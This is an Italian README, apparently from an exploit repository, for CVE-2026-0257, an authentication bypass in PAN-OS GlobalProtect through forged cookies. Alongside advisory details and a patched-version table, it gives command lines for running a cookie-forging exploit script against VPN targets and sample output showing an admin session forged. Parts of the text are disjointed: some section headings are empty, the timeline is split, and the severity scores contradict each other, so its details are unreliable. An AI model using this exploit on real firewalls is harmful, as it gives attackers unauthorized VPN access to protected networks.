
CVE-2026-0257
PAN-OS: Vulnerabilità di bypass dell'autenticazione di GlobalProtect
Bypass dell'autenticazione nel portale e gateway GlobalProtect
CVE-2026-0257 è una vulnerabilità di bypass dell'autenticazione che interessa i componenti del portale e gateway GlobalProtect del software PAN-OS di Palo Alto Networks.
Un attaccante remoto non autenticato può eludere le restrizioni di sicurezza e stabilire una connessione VPN non autorizzata sui firewall interessati.
Nota: Panorama e Cloud NGFW non sono interessati.
Vettore (esempio CVSS 4.0):
CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:H/SI:H/SA:N
Le vulnerabilità di bypass dell'autenticazione nel portale e gateway GlobalProtect del software PAN-OS® di Palo Alto Networks consentono all'attaccante di eludere le restrizioni di sicurezza e stabilire una connessione VPN non autorizzata.
Il problema deriva da CWE-565: Dipendenza dai cookie senza validazione e controllo dell'integrità.
Non interessati:
Questa vulnerabilità richiede la seguente configurazione per essere sfruttabile:
Alto impatto sulla riservatezza e integrità delle reti protette.
python3 CVE-2026-0257.py --target vpn.company.com
python3 CVE-2026-0257.py --target 192.168.1.100 --user administrator --verbose
╔══════════════════════════════════════════════════════════════╗
║ CVE-2026-0257 - GlobalProtect Auth Bypass ║
║ Public Key Cookie Forging Exploit ║
║ Author: 0xBlackash ║
╚══════════════════════════════════════════════════════════════╝
[*] Connecting to vpn.company.com:443 to extract certificate chain...
[+] Found 2048-bit RSA key
[*] Forging authentication cookie for user: admin
[1/1] Trying public key...
Cookie (first 60 chars): eyJhbGciOiJSUzI1NiIsInR5cCI6IkpXVCJ9...
[+] SUCCESS! Authentication Bypass Achieved!
Username : admin
Cookie : eyJhbGciOiJSUzI1NiIsInR5cCI6IkpXVCJ9...
Versioni corrette (applicare urgentemente):
| Versione PAN-OS | Release corretta |
|---|---|
| 12.1 | ≥ 12.1.4-h6, ≥ 12.1.7 |
| 11.2 | ≥ 11.2.4-h17, ≥ 11.2.7-h14, ecc. |
| 11.1 | ≥ 11.1.4-h33, ≥ 11.1.7-h6, ecc. |
| 10.2 | ≥ 10.2.7-h34, ≥ 10.2.10-h36, ecc. |
Anche Prisma Access dispone di versioni corrette corrispondenti.
Soluzioni alternative immediate (se non è possibile applicare la patch):
| Data | Evento |
|---|---|
| 2026-05-13 | Pubblicazione CVE + Advisory iniziale |
| 2026-05-17 | Sfruttamento osservato in ambiente reale |
Raccomandazione: Applicare la patch immediatamente — trattare come critica nonostante il punteggio CVSS base a causa dello sfruttamento attivo.
Generato in stile README — 30 maggio 2026
| Metrica | Punteggio | Valutazione |
|---|
| CVSS v4.0 | 7.8 / 4.7 | Alta / Media |
| CVSS v3.x | Fino a 9.8 | Critica |
| Urgenza | ALTISSIMA | - |
| 2026-05-29 | Aggiornamento Palo Alto + aggiunta CISA KEV |
| 2026-05-30 | Presente report |